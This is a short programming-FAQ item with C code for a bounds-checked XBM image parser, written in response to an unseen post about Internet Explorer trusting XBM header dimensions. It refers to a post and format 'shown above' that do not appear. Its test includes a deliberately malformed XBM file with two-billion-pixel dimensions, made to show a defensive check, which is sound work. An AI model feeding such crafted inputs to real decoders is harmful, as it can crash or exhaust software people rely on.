[02-04-27] [pl] Sztolnia kodera, FAQ p.c.p. http://www.sztolnia.pl
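The post's point is that the decoder trusts the width and height in the XBM header and sizes its buffer from them. The block below is an added example, not Internet Explorer's decoder nor any real library's: a small header parser for the text format shown above that rejects the inputs the post describes (missing, zero, negative or absurd dimensions) before any size arithmetic happens, guards the multiplication anyway, and then checks that the amount of pixel data present matches what the header promised. MAX_DIM is an assumed policy limit; the two sample files are constructed inline.

```c
/* Added example: bounds-checked parsing of an XBM header and data block. */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_DIM 16384   /* assumed limit; a real decoder ties this to its memory budget */

enum xbm_status { XBM_OK = 0, XBM_NO_HEADER, XBM_BAD_DIMENSION, XBM_TOO_LARGE, XBM_DATA_MISMATCH };

struct xbm_info {
    long width, height;
    size_t expected_bytes;   /* ((width + 7) / 8) * height */
    size_t data_bytes;       /* byte literals actually present in the file */
};

/* Locate "#define <name><suffix> <number>" and parse the number; 1 on success. */
static int find_define(const char *text, const char *suffix, long *val)
{
    const char *p = text;
    size_t sl = strlen(suffix);
    while ((p = strstr(p, "#define")) != NULL) {
        p += 7;
        const char *name = p + strspn(p, " \t");
        const char *name_end = name + strcspn(name, " \t\r\n");
        size_t nl = (size_t)(name_end - name);
        if (nl >= sl && memcmp(name_end - sl, suffix, sl) == 0) {
            char *end;
            long v = strtol(name_end, &end, 10);
            if (end == name_end) return 0;   /* "??" or nothing: no usable number */
            *val = v;
            return 1;
        }
    }
    return 0;
}

/* Count the byte literals between '{' and '}'; 0 if the data block is malformed. */
static int count_data_bytes(const char *text, size_t *count)
{
    const char *p = strchr(text, '{');
    const char *end = p ? strchr(p, '}') : NULL;
    size_t n = 0;
    if (!p || !end) return 0;
    for (p++; p < end; ) {
        p += strspn(p, " \t\r\n,");
        if (p >= end) break;
        char *q;
        unsigned long v = strtoul(p, &q, 0);   /* base 0 accepts 0x.. literals */
        if (q == p || v > 0xFF) return 0;
        n++;
        p = q;
    }
    *count = n;
    return 1;
}

enum xbm_status parse_xbm(const char *text, struct xbm_info *info)
{
    long w, h;
    memset(info, 0, sizeof *info);
    if (!find_define(text, "_width", &w) || !find_define(text, "_height", &h))
        return XBM_NO_HEADER;
    info->width = w;
    info->height = h;
    /* Reject before any size arithmetic: this is the check the post says IE lacks. */
    if (w <= 0 || h <= 0 || w > MAX_DIM || h > MAX_DIM)
        return XBM_BAD_DIMENSION;
    size_t row_bytes = ((size_t)w + 7) / 8;
    if ((size_t)h > SIZE_MAX / row_bytes)   /* cannot wrap under MAX_DIM; kept so the limit can be raised */
        return XBM_TOO_LARGE;
    info->expected_bytes = row_bytes * (size_t)h;
    if (!count_data_bytes(text, &info->data_bytes) || info->data_bytes != info->expected_bytes)
        return XBM_DATA_MISMATCH;
    return XBM_OK;
}

/* Constructed 8x2 image: one byte per row. */
static const char GOOD_XBM[] =
    "#define pic_width 8\n"
    "#define pic_height 2\n"
    "static unsigned char pic_bits[] = {\n"
    "   0xff, 0x81 };\n";

/* Constructed malformed file of the kind the post describes: a header that
 * would make a naive decoder allocate gigabytes for two bytes of data. */
static const char BAD_XBM[] =
    "#define pic_width 2000000000\n"
    "#define pic_height 2000000000\n"
    "static unsigned char pic_bits[] = { 0xff, 0x81 };\n";

int main(void)
{
    struct xbm_info info;
    enum xbm_status st = parse_xbm(GOOD_XBM, &info);
    printf("good: status %d, expects %zu bytes, has %zu\n", st, info.expected_bytes, info.data_bytes);
    st = parse_xbm(BAD_XBM, &info);
    printf("bad:  status %d (width %ld, height %ld)\n", st, info.width, info.height);
    return 0;
}
```

Two design choices carry the weight here: the dimension check happens before the buffer size is even computed, so an absurd header never reaches an allocator, and the data count is compared against the header rather than trusted, so a short file cannot lead to reads past the end of whatever was loaded.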